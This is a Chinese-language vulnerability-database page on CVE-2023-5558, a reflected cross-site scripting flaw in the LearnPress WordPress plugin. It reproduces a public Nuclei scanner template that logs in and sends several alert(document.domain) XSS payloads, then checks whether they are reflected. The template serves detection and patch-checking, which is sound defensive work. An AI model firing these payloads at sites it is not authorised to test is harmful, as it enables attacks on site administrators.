CVE-2023-5558: LearnPress < 4.2.5.5 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: LearnPress | POC: 已公开

漏洞描述

The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

PoC代码[已公开]

id: CVE-2023-5558

info:
  name: LearnPress < 4.2.5.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Allows attackers to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5558
    cwe-id: CWE-79
    epss-score: 0.04059
    epss-percentile: 0.88096
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 6
    vendor: thimpress
    product: learnpress
    framework: wordpress
  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "/wp-content/plugins/learnpress"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - '?param=value%22%27%3Balert(document.domain)%3C!--'
        - '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
        - '?%27-alert(%60XSS%60)-%27=a'
        - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"';alert(document.domain)<!--"
          - "\"';alert(document.domain);b='"
          - "'-alert(`XSS`)-'=a"
          - "</script><script>alert`document.domain`</script>"
        condition: or

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204690b4847ad0354285726148a13229b3761ffcc93ba5ad9386142ff336167027022100aed40d9c9446311545ecde1d3b540dfcf9c9b22584f647a1f81f8951853deb61:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-5558.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-0271: LearnPress <4.1.6 - Cross-Site Scripting POC

CVE-2022-45808: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi POC

CVE-2022-47615: LearnPress Plugin < 4.2.0 - Local File Inclusion POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC